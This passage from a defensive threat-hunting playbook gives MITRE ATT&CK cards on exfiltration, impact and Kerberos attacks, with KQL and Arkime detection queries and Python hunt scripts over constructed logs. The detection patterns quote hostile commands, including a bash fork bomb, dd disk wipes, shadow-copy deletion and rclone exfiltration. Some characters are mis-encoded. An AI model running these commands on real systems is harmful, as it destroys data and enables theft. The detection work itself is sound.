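    maximum over all non-TLD labels catches both cases."""
    labels = qname.rstrip(".").split(".")[:-1] or [qname]
    return max(shannon_entropy(label) for label in labels)


def hunt_dns(log_text: str) -> dict:
    """Per-source statistics: unique query names, NXDOMAIN rate, mean entropy."""
    per_host = defaultdict(lambda: {"names": set(), "total": 0, "nx": 0, "ent": 0.0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        h = per_host[rec["id.orig_h"]]
        h["names"].add(rec["query"].lower())
        h["total"] += 1
        h["nx"] += rec.get("rcode_name") == "NXDOMAIN"
        h["ent"] += name_entropy(rec["query"])
    return {
        ip: {"unique_queries": len(h["names"]),
             "nxdomain_rate": h["nx"] / h["total"],
             "mean_entropy": h["ent"] / h["total"]}
        for ip, h in per_host.items()
    }


def suspicious_hosts(stats: dict, min_unique=8, nx_rate=0.5, entropy=3.2) -> list:
    """Hosts tripping any of the three card heuristics (illustrative thresholds)."""
    return sorted(ip for ip, s in stats.items()
                  if s["unique_queries"] >= min_unique
                  or s["nxdomain_rate"] >= nx_rate
                  or s["mean_entropy"] >= entropy)


if __name__ == "__main__":
    stats = hunt_dns(SAMPLE_DNS_LOG)
    for ip, s in stats.items():
        print(ip, s)
    print("suspicious:", suspicious_hosts(stats))
```

In production the thresholds should come from the peer baseline the card describes (unique-query counts far above other hosts), not from fixed numbers.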
T1052.001

Exfiltration Over USB

[MITRE]
Adversaries physically transfer data by copying files to a removable USB drive. Common in high-security environments where network exfil is blocked. Monitor for USB insertion events paired with file copy activity.
[KQL] New external device recognized (USB insertion)
event.code: 6416
[KQL] Process creation with command line — check drive letter for removable media
event.code: 4688 AND winlog.event_data.CommandLine: *
-- Inspect drive letter in CommandLine: E:, F:, G: etc. may indicate removable drive
[KQL] USB device connection/disconnection lifecycle events
event.code: (2003 OR 2100 OR 2102)
-- 2003: USB device connection initiated
-- 2100: Intermediate USB disconnection tracked
-- 2102: Final USB disconnection
T1020

Automated Exfiltration

[MITRE]
Adversaries use scripts or tools (Rclone, FileZilla, WinSCP, custom Python) to automatically transfer massive amounts of data as quickly as possible — minimizing the window for defenders to detect and stop the exfiltration.
[KQL] Command line file transfer utilities commonly abused for rapid automated exfiltration
process.name: ("rclone.exe" OR "pscp.exe" OR "filezilla.exe" OR "winscp.exe") AND process.command_line: ("*sync*" OR "*copy*") AND process.command_line: ("*ftp:*" OR "*sftp:*" OR "*scp:*")
[Arkime] Automated mass file transfers over FTP (high frequency STOR/PUT commands)
protocols == ftp && ftp.request.command == "STOR"
T1030

Data Transfer Size Limits

[MITRE]
Adversaries chunk stolen data into small pieces (5–10MB) and send slowly over days or weeks ("low and slow") to evade DLP systems and NetFlow analytics that flag sudden bandwidth spikes.
[KQL] Archiving tools splitting data into small volumes for stealthy exfiltration (7z -v split)
process.name: ("7z.exe" OR "rar.exe" OR "tar") AND process.command_line: ("*-v*" OR "*split*") AND process.command_line: ("*m *" OR "*k *")
[KQL] Rhythmic, uniform outbound transfers — e.g., exactly 10MB sent every hour (NetFlow; ES|QL: KQL has no aggregation pipeline)
FROM logs-* | WHERE network.direction == "outbound" AND network.bytes >= 9500000 AND network.bytes <= 10500000 | STATS transfers = COUNT(*) BY destination.ip | WHERE transfers > 20
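The query above only counts transfers in a size band; what makes chunked "low and slow" exfiltration stand out is that both the gaps and the sizes are nearly identical. As an added example that is not part of the playbook, the script below measures that regularity over constructed NetFlow-style records (field names ts, src, dst, bytes_out and the thresholds are assumptions); with min_bytes lowered it serves the T1659 heartbeat hunt as well.

```python
"""Added example (not the playbook's own code): the rhythmic-transfer hunt
from the T1030 card, run offline over constructed NetFlow-style records.
Regularity is measured with the coefficient of variation (stdev / mean) of
the inter-transfer gaps and of the byte counts; thresholds are illustrative."""
import statistics
from collections import defaultdict

# Constructed sample: 10.0.0.9 pushes ~10 MB to 203.0.113.7 every hour for a
# day; 10.0.0.5 talks to 198.51.100.20 with irregular sizes and timing.
SAMPLE_FLOWS = [
    {"ts": 3600 * i, "src": "10.0.0.9", "dst": "203.0.113.7",
     "bytes_out": 10_000_000 + (i % 3) * 50_000}
    for i in range(24)
] + [
    {"ts": t, "src": "10.0.0.5", "dst": "198.51.100.20", "bytes_out": b}
    for t, b in [(120, 4_000), (300, 9_800_000), (310, 12_000), (4_000, 700),
                 (9_000, 2_400_000), (9_100, 55_000), (20_000, 300)]
]


def coefficient_of_variation(values) -> float:
    """stdev / mean; 0.0 means perfectly uniform, inf when the mean is zero."""
    mean = statistics.fmean(values)
    if mean == 0:
        return float("inf")
    return statistics.pstdev(values) / mean


def rhythmic_transfers(flows, min_events=6, max_cv=0.05, min_bytes=1_000_000) -> dict:
    """Return {(src, dst): summary} for pairs whose outbound transfers of at
    least min_bytes are both evenly spaced in time and nearly equal in size."""
    by_pair = defaultdict(list)
    for f in flows:
        if f["bytes_out"] >= min_bytes:
            by_pair[(f["src"], f["dst"])].append(f)
    hits = {}
    for pair, evts in by_pair.items():
        if len(evts) < min_events:
            continue
        evts.sort(key=lambda f: f["ts"])
        gaps = [b["ts"] - a["ts"] for a, b in zip(evts, evts[1:])]
        sizes = [f["bytes_out"] for f in evts]
        gap_cv = coefficient_of_variation(gaps)
        size_cv = coefficient_of_variation(sizes)
        if gap_cv <= max_cv and size_cv <= max_cv:
            hits[pair] = {"events": len(evts),
                          "mean_gap_s": statistics.fmean(gaps),
                          "mean_bytes": statistics.fmean(sizes),
                          "gap_cv": gap_cv, "size_cv": size_cv}
    return hits


if __name__ == "__main__":
    for pair, summary in rhythmic_transfers(SAMPLE_FLOWS).items():
        print(pair, summary)
```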
T1011

Exfiltration Over Other Network Medium

[MITRE]
Adversaries bypass perimeter monitoring by using alternate physical networks: cellular modems (4G/5G USB dongles), Bluetooth file transfers, or an adjacent unmonitored Wi-Fi network (guest network, rogue AP in the parking lot).
KQLEndpoints bridging networks by connecting to unapproved Wi-Fi SSIDs (WLAN Operational log)
winlog.channel: "Microsoft-Windows-WLAN-AutoConfig/Operational" AND winlog.event_id: 8001 AND NOT winlog.event_data.SSID: "Corporate_WiFi"
InfoCellular/alternate Wi-Fi exfil is completely invisible to perimeter sensors
Data exfiltrated over cellular or a different Wi-Fi network bypasses the corporate firewall and IDS entirely. You will have zero network visibility. Rely on endpoint USB/adapter logs and WLAN event logs.
T1567

Exfiltration Over Web Service

[MITRE]
Adversaries use trusted consumer cloud storage (Google Drive, Dropbox, Mega, OneDrive) to exfiltrate data; firewalls rarely block these services and DLP struggles to distinguish a legitimate upload from data theft.
KQLHigh-volume uploads to consumer file-sharing services, especially from server subnets
event.dataset: "network_traffic" AND destination.domain: ("*dropbox.com*" OR "*drive.google.com*" OR "*mega.nz*" OR "*pastebin.com*") AND network.direction: "outbound"
ArkimeMassive HTTP POST/PUT to cloud storage APIs
http.method == "POST" && (host == "api.dropboxapi.com" || host == "www.googleapis.com" || host == "gofile.io")
T1029

Scheduled Transfer

[MITRE]
Adversaries schedule exfiltration to occur during non-business hours (e.g., 3AM Sunday) when IT staff is asleep, minimizing the chance of a network administrator noticing bandwidth spikes or investigating latency.
KQLLarge outbound transfers occurring exclusively outside business hours
network.direction: "outbound" AND source.bytes > 100000000 AND (hour_of_day > 20 OR hour_of_day < 5)
-- hour_of_day is not an ECS field: define it as a runtime field derived from @timestamp in the site's local time zone; weekends count as off-hours too
KQLScheduled tasks (svchost.exe parent) executing exfiltration tools
process.parent.name: "svchost.exe" AND process.name: ("curl.exe" OR "powershell.exe" OR "rclone.exe") AND process.command_line: ("*POST*" OR "*upload*")
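The two timing hunts above (T1030 rhythmic uniform transfers and T1029 off-hours bulk transfers) both reduce to statistics over per-flow records, which the Lens pseudo-queries only sketch. The following is an added example, not code from the playbook, run over constructed NetFlow-style records: it flags a destination whose flow sizes and inter-arrival gaps are both nearly constant, and separately any single flow above 100 MB outside business hours. Field names and thresholds are assumptions; tune min_flows and the coefficient-of-variation limits against your own baseline.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev


def _build_flows():
    """Constructed NetFlow-style records: (ISO timestamp, destination.ip, outbound bytes).
    Not real data; built so that each detection below has exactly one hit."""
    flows = []
    base = datetime(2024, 3, 4, 0, 0, tzinfo=timezone.utc)          # a Monday
    # Low-and-slow beacon: 24 hourly flows of ~10 MB with a few seconds of jitter
    for i in range(24):
        t = base + timedelta(hours=i, seconds=(i % 3) * 7)
        flows.append((t.isoformat(), "203.0.113.7", 10_000_000 + (i % 5) * 20_000))
    # Backup job: 24 flows with irregular sizes and widening gaps (must not fire)
    for i in range(24):
        t = base + timedelta(minutes=3 * i * i)
        flows.append((t.isoformat(), "198.51.100.5", 1_000_000 * (1 + i % 7)))
    # One 150 MB upload at 03:00 on Sunday and one at 14:00 on Monday
    flows.append(((base + timedelta(days=6, hours=3)).isoformat(), "203.0.113.9", 150_000_000))
    flows.append(((base + timedelta(hours=14)).isoformat(), "192.0.2.20", 150_000_000))
    return flows


FLOWS = _build_flows()


def parse_ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def periodic_uniform_destinations(flows, min_flows=20, size_cv=0.05, gap_cv=0.10):
    """T1030 hunt: destinations receiving >= min_flows flows whose sizes and
    inter-arrival gaps are both nearly constant (coefficient of variation below
    the thresholds). Uniform size alone is weak; uniform timing is the signal."""
    by_dst = defaultdict(list)
    for ts, dst, nbytes in flows:
        by_dst[dst].append((parse_ts(ts), nbytes))
    hits = []
    for dst, rows in by_dst.items():
        if len(rows) < min_flows:
            continue
        rows.sort()
        sizes = [b for _, b in rows]
        gaps = [(rows[i][0] - rows[i - 1][0]).total_seconds() for i in range(1, len(rows))]
        if pstdev(sizes) / mean(sizes) <= size_cv and pstdev(gaps) / mean(gaps) <= gap_cv:
            hits.append({"destination.ip": dst, "flows": len(rows),
                         "mean_bytes": int(mean(sizes)), "mean_gap_s": int(mean(gaps))})
    return hits


def off_hours_bulk_transfers(flows, min_bytes=100_000_000, start_hour=20, end_hour=5):
    """T1029 hunt: single flows above min_bytes that start after start_hour,
    before end_hour, or on a weekend (UTC here; shift to the site's local zone)."""
    hits = []
    for ts, dst, nbytes in flows:
        t = parse_ts(ts)
        off_hours = t.hour >= start_hour or t.hour < end_hour or t.weekday() >= 5
        if nbytes >= min_bytes and off_hours:
            hits.append({"destination.ip": dst, "bytes": nbytes, "when": t.isoformat()})
    return hits


if __name__ == "__main__":
    for hit in periodic_uniform_destinations(FLOWS) + off_hours_bulk_transfers(FLOWS):
        print(hit)
```

The backup job is deliberately included as the false-positive case: its sizes are in the same range as the beacon but its gaps are irregular, so the coefficient-of-variation test on timing is what separates the two.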
T1537

Transfer Data to Cloud Account

[MITRE]
Adversaries copy victim cloud data (AWS snapshots, S3 objects) directly to an adversary-controlled cloud account over the provider's backbone; the transfer never crosses the victim's perimeter firewall, so there is no network visibility.
KQLAWS snapshots/AMIs being shared with unknown external Account IDs (primary cloud exfil method)
event.dataset: "aws.cloudtrail" AND event.action: ("ModifySnapshotAttribute" OR "ModifyImageAttribute") AND aws.cloudtrail.request_parameters: (*createVolumePermission* OR *launchPermission*)
-- Snapshots are shared via createVolumePermission, AMIs via launchPermission; "group":"all" in either means public. Elastic's AWS module stores request parameters as a JSON string in aws.cloudtrail.request_parameters, so adjust the field path to your ingest and compare the userId values against your own account IDs
InfoCloud-to-cloud exfil happens entirely on the provider backend, with no perimeter visibility
Cloud-to-cloud exfiltration (e.g., AWS snapshot copy, S3 bucket sync to another account) happens on the provider's backbone. You will have zero network visibility. Rely entirely on CloudTrail / Azure Audit logs.

Impact TA0040

Adversaries use Impact techniques to disrupt availability or compromise integrity of systems and data. Goals range from denying service to end users, to destroying systems, to manipulating data for financial gain.

T1498

Network Denial of Service

[MITRE]
Adversaries flood network resources to degrade or deny service. Common attack types include SYN floods, ICMP/Smurf attacks, and Fraggle (UDP) attacks. Use Arkime for initial detection and Wireshark for deep-dive analysis.
ArkimeSYN flood: many sessions with a SYN and no ACK; use Wireshark for per-packet analysis
protocols == tcp && tcpflags.syn >= 1 && tcpflags.ack == 0
-- tcpflags.* are per-session packet counts in Arkime. Spoofed floods show many distinct source IPs with identical TCP window size and TTL; check source-IP cardinality in Arkime and tcp.window_size / ip.ttl in Wireshark
ArkimeSmurf attack: unusual ICMP volume to/from many hosts
protocols == icmp
ArkimeFraggle attack: large UDP packets to echo/chargen ports 7 and 19
protocols == udp && port == [7,19]
T1529

System Shutdown/Reboot

[MITRE]
Adversaries shut down or reboot systems to disrupt access, interrupt processes, or force a restart to re-infect boot persistence. Ransomware commonly uses this after encryption is complete.
KQLSystem shutdown/restart initiated by application (Ev1074) or clean shutdown (Ev6006)
winlog.channel: "System" AND event.code: (1074 OR 6006)
-- 1074: System shutdown/restart initiated by a process (the event names the process and user)
-- 6006: Event Log Service stopped (clean shutdown)
KQLAdditional shutdown/reboot/crash event codes (keep the channel filter; these small IDs collide with other providers)
winlog.channel: "System" AND event.code: (41 OR 1076 OR 6005 OR 6008 OR 6013)
-- 41: Unexpected reboot (kernel power)
-- 1076: User-specified reason for last unexpected shutdown
-- 6005: Event Log Service started (system startup)
-- 6008: Unexpected/dirty shutdown recorded
-- 6013: System uptime
KQLshutdown.exe process execution (command-line forced shutdown)
process.name: shutdown.exe
T1531

Account Access Removal

[MITRE]
Adversaries lock legitimate users and administrators out of their own network by mass-resetting passwords, deleting Domain Admin accounts, or revoking MFA devices, so that incident responders cannot log in to stop ongoing destruction.
KQLAdmin accounts resetting other admin passwords or deleting accounts in bulk (Event ID 4724, 4726)
winlog.event_id: (4724 OR 4726) AND winlog.event_data.TargetUserName: ("*admin*" OR "Administrator") AND NOT user.name: "SYSTEM"
-- Aggregate by SubjectUserName over a short window: a few resets per day is normal helpdesk work, dozens in minutes is not. Add 4725 (account disabled) and 4740 (lockout) for the same actor.
T1485

Data Destruction

[MITRE]
Adversaries permanently destroy files and data with wiper malware (NotPetya, WhisperGate) or with tools like Sysinternals sdelete.exe. Unlike ransomware, data destruction is pure sabotage: no decryption key exists, so recovery depends entirely on offline backups.
KQLBuilt-in and Sysinternals tools used to securely wipe files and free space
process.name: ("sdelete.exe" OR "sdelete64.exe" OR "cipher.exe" OR "fsutil.exe") AND process.command_line: ("*-z*" OR "* -p *" OR "*/w:*" OR "*usn deletejournal*")
KQLMassive volume of file deletions across the filesystem in a short window
event.category: "file" AND event.action: "deletion" AND file.path: ("*\\Documents\\*" OR "*\\Desktop\\*") | stats count by process.name | where count > 1000
T1486

Data Encrypted for Impact

[MITRE]
Ransomware. Adversaries encrypt files, databases, and network shares and demand cryptocurrency payment for the decryption key. High CPU/disk I/O, mass file rename events (.docx to .docx.encrypted), and README_FOR_DECRYPT.txt drops are key indicators.
KQLRansomware encrypting network file shares: massive write/rename operations over SMB (Event ID 5145)
winlog.event_id: 5145 AND winlog.event_data.AccessMask: "0x120116" | stats count by source.ip | where count > 5000
-- 5145 needs "Audit Detailed File Share" and is extremely high volume; scope it to file servers and pivot on the client source.ip, which is the host running the encryptor
KQLRansomware note drops โ€” creation of text/html files in every directory
event.category: "file" AND event.action: "creation" AND file.name: ("*decrypt*" OR "*RECOVER*" OR "*ransom*" OR "*README*") | stats count by process.name | where count > 10
T1565

Data Manipulation

[MITRE]
Adversaries insert, delete, or modify stored/transmitted data to influence business decisions, sabotage operations, or destroy trust in data integrity, without outright deletion, which makes the attack harder to detect.
KQLUnexpected bulk UPDATE/INSERT operations in database audit logs
event.dataset: "sql.audit" AND event.action: ("UPDATE" OR "INSERT" OR "DELETE") AND NOT user.name: ("app_service_account") | stats count by user.name | where count > 500
KQLBulk file modification on sensitive document directories (Security 4663 with a write SACL, or EDR file telemetry)
event.code: 4663 AND winlog.event_data.AccessMask: ("0x2" OR "0x4") AND winlog.event_data.ObjectName: ("*\\Finance\\*" OR "*\\HR\\*" OR "*\\Legal\\*") AND NOT winlog.event_data.ProcessName: ("*\\WINWORD.EXE" OR "*\\EXCEL.EXE")
-- Sysmon has no generic file-modify event; Sysmon Event ID 2 is "file creation time changed" and catches the timestomping often used to hide a manipulation, so hunt it on the same paths as a second signal
T1491

Defacement

[MITRE]
Adversaries modify web content or internal intranet pages to spread propaganda, cause embarrassment, demonstrate access, or intimidate the organization, often replacing the home page with a political or extortion message.
KQLUnexpected modification of web root files by non-deployment processes
event.category: "file" AND event.action: ("modification" OR "creation") AND file.path: ("*\\inetpub\\wwwroot\\*" OR "/var/www/html/*") AND NOT process.name: ("w3wp.exe" OR "httpd" OR "nginx")
-- Also exclude your deployment tooling (CI agent, rsync, msdeploy); web server processes themselves rarely write to the document root, so a hit on w3wp.exe or php-fpm is itself interesting
KQLWeb shell or script drop in web-accessible directory
event.category: "file" AND event.action: "creation" AND file.path: ("*\\wwwroot\\*" OR "*/public_html/*" OR "/var/www/*") AND file.extension: ("php" OR "asp" OR "aspx" OR "jsp" OR "html")
T1561

Disk Wipe

[MITRE]
Adversaries wipe the Master Boot Record (MBR) or the entire disk structure of the compromised system, instantly bricking the machine and preventing the OS from booting. Used by nation-state wipers such as NotPetya and HermeticWiper.
KQLRaw disk access, an indicator of MBR overwrite (Sysmon Event ID 9)
winlog.event_id: 9 AND winlog.event_data.Device: "\\Device\\HarddiskVolume*" AND process.executable: ("*\\Temp\\*" OR "*\\AppData\\*")
-- Sysmon 9 (RawAccessRead) fires for raw reads of the volume; backup, imaging and AV products do this legitimately, so the path filter on the reading process is what makes the query usable
KQLLinux dd command writing zeroes or random data to a block device (MBR/disk wipe)
process.name: "dd" AND process.command_line: ("*if=/dev/zero*" OR "*if=/dev/urandom*") AND process.command_line: ("*of=/dev/sd*" OR "*of=/dev/nvme*" OR "*of=/dev/vd*")
T1499

Endpoint Denial of Service

[MITRE]
Adversaries crash or exhaust the resources (CPU, Memory, Disk) of a specific endpoint or server by exploiting a vulnerability that triggers a BSOD, or by running fork bomb scripts that consume all available memory.
KQLLinux fork bomb execution โ€” bash script spawning endless copies of itself
process.name: ("bash" OR "sh") AND process.command_line: ":(){ :|:& };:"
KQLExtreme process creation rate from a single parent โ€” resource exhaustion indicator
event.category: "process" AND event.type: "start" | stats count by process.parent.name | where count > 1000
T1657

Financial Theft

[MITRE]
Adversaries conduct financial fraud as the primary goal: Business Email Compromise (BEC) rerouting wire transfers, unauthorized ACH/SWIFT transactions, or cryptocurrency theft from exchange wallets or hot wallets on compromised hosts.
KQLO365 mail forwarding rules created to send finance emails to external addresses
event.dataset: "o365.audit" AND event.action: ("New-InboxRule" OR "Set-InboxRule" OR "UpdateInboxRules") AND o365.audit.Parameters: ("*ForwardTo*" OR "*RedirectTo*" OR "*ForwardAsAttachmentTo*") AND o365.audit.Parameters: ("*@gmail.com*" OR "*@protonmail*")
-- UpdateInboxRules covers rules created from Outlook rather than PowerShell. The shape of the Parameters field depends on the Filebeat o365 module version (array vs. flattened object), so confirm the path against a known rule-creation event before alerting, and prefer "any external domain" over a list of free-mail providers
KQLCryptocurrency wallet software or exchange access from enterprise endpoints
process.name: ("bitcoin-qt.exe" OR "electrum.exe" OR "exodus.exe") OR destination.domain: ("*binance.com*" OR "*coinbase.com*" OR "*kraken.com*")
T1495

Firmware Corruption

[MITRE]
Adversaries overwrite or corrupt device firmware (UEFI/BIOS, network device firmware, SSD controller firmware) to permanently brick hardware or to plant a bootkit that survives OS reinstalls, making full recovery effectively impossible.
KQLFirmware flashing tools run from user context
process.name: ("fwupdate.exe" OR "flashrom" OR "flashrom.exe") OR process.command_line: "*chipsec_main*"
-- chipsec runs as python.exe, so match on the command line rather than process.name; OEM updaters are signed, so pivot on process.code_signature.trusted and the parent process
KQLUEFI variable writes require SeSystemEnvironmentPrivilege (Audit Sensitive Privilege Use, Event ID 4673)
event.code: 4673 AND winlog.event_data.PrivilegeList: *SeSystemEnvironmentPrivilege* AND NOT winlog.event_data.ProcessName: ("*\\Windows\\System32\\*" OR "*\\Windows\\SysWOW64\\*")
-- Sysmon registry events do not see SetFirmwareEnvironmentVariable calls; 4673 is noisy, so baseline the OEM and Windows Update processes that legitimately use this privilege
T1490

Inhibit System Recovery

[MITRE]
Before ransomware or wiper execution, adversaries delete Volume Shadow Copies, backup catalogs, and disable Windows Recovery Environment โ€” ensuring IT cannot roll back the server to restore data without paying the ransom.
KQLThe ransomware pre-execution trinity: deleting backups and disabling recovery
process.name: ("vssadmin.exe" OR "bcdedit.exe" OR "wbadmin.exe" OR "wmic.exe") AND process.command_line: ("*delete shadows*" OR "*resize shadowstorage*" OR "*recoveryenabled No*" OR "*bootstatuspolicy ignoreallfailures*" OR "*delete catalog*" OR "*shadowcopy delete*")
-- Some backup agents run vssadmin delete shadows on a schedule; baseline by parent process and time of day. The PowerShell equivalent (Get-WmiObject Win32_ShadowCopy | Remove-WmiObject) needs a separate command-line hunt
T1496

Resource Hijacking

[MITRE]
Cryptomining. Adversaries compromise servers and cloud infrastructure solely to steal CPU/GPU for mining Monero (XMRig, xmr-stak), costing the organization thousands in cloud bills and degrading service performance without destroying data.
KQLCommon cryptominer execution: process name or Stratum pool arguments
process.name: ("xmrig" OR "xmrig.exe" OR "minerd" OR "cgminer" OR "xmr-stak") OR process.command_line: ("*--donate-level*" OR "*stratum+tcp://*" OR "*stratum+ssl://*" OR "*pool.minexmr.com*")
Arkime / WiresharkStratum mining protocol in unencrypted traffic (JSON-RPC over raw TCP)
protocols == tcp && port.dst == [3333,4444,5555,7777,14444]
-- Arkime session expressions cannot match payload bytes; use the Hunts tab to search these sessions for the strings mining.subscribe (Bitcoin-style Stratum) or "login" with a wallet-looking "user" value (XMRig). In Wireshark: tcp contains "mining.subscribe"
T1489

Service Stop

[MITRE]
Adversaries stop AV services to evade detection, or stop business services (Exchange, SQL Server) to release file locks so ransomware can encrypt the .mdf/.edb database files that would otherwise be locked by the running service.
KQLCommands stopping critical enterprise services, often immediately preceding ransomware encryption
process.name: ("net.exe" OR "net1.exe" OR "sc.exe" OR "taskkill.exe") AND process.command_line: ("* stop msexchange*" OR "* stop mssql*" OR "* stop veeam*" OR "* /im sqlservr.exe*")
-- Corroborate with System log 7036 ("entered the stopped state") bursts for many services within a minute, and with 4688/Sysmon 1 showing the stop commands launched from a script or an unusual parent
Dashboards / IDS Rules
Kibana dashboard widgets, Elastic Lens configuration notes, visualization mockups, and Suricata IDS rules organized by related MITRE ATT&CK tactic.

Kibana Dashboard Widgets 20 widgets

Each card contains the KQL query, Elastic Lens configuration table, and a mockup preview of the visualization. Build these in Kibana: Dashboards -> Create Visualization -> Paste KQL -> Configure Lens as shown.

  • Initial Access: 3 item(s)
  • Execution: 2 item(s)
  • Persistence: 2 item(s)
  • Defense Evasion: 4 item(s)
  • Credential Access: 1 item(s)
  • Discovery: 3 item(s)
  • Lateral Movement: 2 item(s)
  • Command & Control: 1 item(s)
  • Exfiltration: 1 item(s)
  • Impact: 1 item(s)

Suricata IDS Rules 7 rules

Deploy these rules in /etc/suricata/rules/ or paste into your custom rule file. Each card includes the raw rule and a plain-English breakdown.

  • Initial Access: 2 item(s)
  • Execution: 1 item(s)
  • Discovery: 1 item(s)
  • Lateral Movement: 1 item(s)
  • Command & Control: 1 item(s)
  • Exfiltration: 1 item(s)
DoD PowerShell Tools
Host hunt scripts from the DoD SAFE bundle, organized by analyst workflow. Notes and support files that live with a script are kept inside that script card.
  • Active Directory Monitoring: 4 tool(s)
  • Host Collection & Inventory: 9 tool(s)
  • Network & Remote Host Checks: 6 tool(s)
  • Persistence & Autoruns: 9 tool(s)
  • Credential & Lateral Movement Hunts: 7 tool(s)
  • Filesystem & Hiding Places: 6 tool(s)
  • Response Actions: 3 tool(s)
  • Utilities & Support: 5 tool(s)

๐Ÿ” Identity Attacks 8 cards

The most consequential techniques in modern intrusions. Every major ransomware engagement, APT campaign, and insider threat ultimately runs through identity. Includes Kerberoasting, AS-REP Roasting, DCSync, Golden/Silver Tickets, ADCS abuse (ESC1-15), NTLM Relay, and Pass-the-Hash. Each card has detection queries, why it matters, what to look for, mitigations, and the tools attackers use.

T1558.003

Kerberoasting

HIGH [MITRE]

Summary: Request service tickets (TGS) for accounts with SPNs, then crack them offline. Attackers target service accounts because they often have weak passwords that never change.

Why this matters

Domain service accounts (SQL, IIS app pools, legacy apps) frequently have weak passwords set years ago and never rotated. Because any authenticated domain user can request a TGS for any SPN, attackers harvest a pile of encrypted tickets and brute-force them offline with hashcat mode 13100.

What to look for

Event 4769 where TicketEncryptionType is 0x17 (RC4-HMAC); modern systems prefer AES. Attackers explicitly request RC4 because it is far cheaper to crack. Look for bursts of TGS requests from a single user within a short timeframe, requests for SPNs that user never otherwise touches, or user accounts (not machine accounts ending in $) being targeted.

KQL Kerberoasting indicator: RC4 ticket for a user service account (not ending in $)
event.code:4769 and winlog.event_data.TicketEncryptionType:"0x17" and winlog.event_data.TicketOptions:"0x40810000" and winlog.event_data.Status:"0x0" and not winlog.event_data.ServiceName:*$ and not winlog.event_data.ServiceName:krbtgt
-- Accounts that still list RC4 in msDS-SupportedEncryptionTypes get 0x17 tickets legitimately; once the domain is AES-only, any 0x17 TGS is worth a look. Tools can also request AES tickets (0x12), which this filter will not show, so the burst query below is the fallback
KQL (burst detection) Same user requesting 10+ different SPNs in 5 minutes
event.code:4769 and winlog.event_data.TicketEncryptionType:"0x17"
-- Aggregate: group by user.name, count unique winlog.event_data.ServiceName over 5min
-- Alert when count > 10
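The burst detection above needs a sliding window of distinct service names per requester, which Lens aggregation only approximates. The following is an added example, not code from the playbook, run over constructed 4769 records: it applies the RC4 and non-$ filters, then reports users whose busiest 5-minute window touches at least 10 distinct ServiceNames. Field names are the Winlogbeat event_data names; the SPN list and IPs are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"


def _build_events():
    """Constructed Security 4769 records (winlog.event_data field names). Not real logs."""
    base = datetime(2024, 3, 4, 9, 15, 0)
    events = []
    # jdoe pulls RC4 tickets for 12 different service accounts in under two minutes
    spns = ["svc_sql01", "svc_sql02", "svc_iis_app", "svc_backup", "svc_sccm", "svc_exch",
            "svc_ldap_sync", "svc_jenkins", "svc_report", "svc_vcenter", "svc_scan", "svc_print"]
    for i, spn in enumerate(spns):
        events.append({"event.code": 4769, "@timestamp": (base + timedelta(seconds=7 * i)).isoformat(),
                       "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": spn,
                       "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55"})
    # asmith: a normal workday, AES tickets plus one RC4 ticket for a legacy app
    for i, (spn, etype) in enumerate([("svc_sql01", "0x12"), ("svc_iis_app", "0x12"), ("svc_legacy", "0x17")]):
        events.append({"event.code": 4769, "@timestamp": (base + timedelta(minutes=20 * i)).isoformat(),
                       "TargetUserName": "asmith@CORP.LOCAL", "ServiceName": spn,
                       "TicketEncryptionType": etype, "IpAddress": "::ffff:10.0.0.81"})
    # machine-account and krbtgt tickets are excluded even when RC4
    for i, spn in enumerate(["FS01$", "krbtgt", "WS042$"]):
        events.append({"event.code": 4769, "@timestamp": (base + timedelta(seconds=3 * i)).isoformat(),
                       "TargetUserName": "jdoe@CORP.LOCAL", "ServiceName": spn,
                       "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55"})
    return events


EVENTS = _build_events()


def is_roast_candidate(ev):
    """RC4 (0x17) service ticket for a user-style service account."""
    svc = ev["ServiceName"].lower()
    return (ev["event.code"] == 4769
            and ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$")
            and svc != "krbtgt")


def kerberoast_bursts(events, window=timedelta(minutes=5), threshold=10):
    """Per requesting user, find the window of `window` length holding the most
    distinct ServiceNames; alert when that count reaches the threshold."""
    by_user = defaultdict(list)
    for ev in events:
        if is_roast_candidate(ev):
            by_user[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["@timestamp"]), ev["ServiceName"], ev["IpAddress"]))
    alerts = []
    for user, rows in by_user.items():
        rows.sort()
        best, best_start, left = set(), None, 0
        for right in range(len(rows)):
            while rows[right][0] - rows[left][0] > window:   # slide the left edge forward
                left += 1
            spns = {spn for _, spn, _ in rows[left:right + 1]}
            if len(spns) > len(best):
                best, best_start = spns, rows[left][0]
        if len(best) >= threshold:
            alerts.append({"user": user, "distinct_spns": len(best),
                           "window_start": best_start.isoformat(),
                           "source_ips": sorted({ip for _, _, ip in rows})})
    return alerts


if __name__ == "__main__":
    for alert in kerberoast_bursts(EVENTS):
        print(alert)
```

Threshold and window are the tunables: a monitoring host that checks many SQL instances will look like this every polling cycle, so exclude known scanners by source IP rather than lowering the bar for everyone.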
PowerShell (hunt) Enumerate domain accounts with SPNs (review candidates attackers might target)
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName, PasswordLastSet, Enabled |
    Where-Object {$_.Enabled -eq $true} |
    Select-Object Name, SamAccountName, PasswordLastSet, ServicePrincipalName |
    Sort PasswordLastSet

๐Ÿ›ก๏ธ Mitigations

  • Use AES-only Kerberos (disable RC4 via Group Policy: Network Security: Configure encryption types allowed for Kerberos)
  • Use Managed Service Accounts (MSAs/gMSAs): the password is long random data (240 bytes) and rotates automatically
  • Enforce 25+ character passwords on all SPN-holding accounts
  • Enable Event 4769 auditing on all Domain Controllers
  • Monitor for SPNs on privileged accounts (Domain Admins should have NO SPNs)

Tools used by attackers / defenders

Rubeus, Impacket GetUserSPNs.py, PowerView Invoke-Kerberoast, hashcat -m 13100
T1558.004

AS-REP Roasting

HIGH [MITRE]

Summary: Exploits accounts with 'Do not require Kerberos preauthentication' enabled: request an AS-REP message containing encrypted material that can be cracked offline.

Why this matters

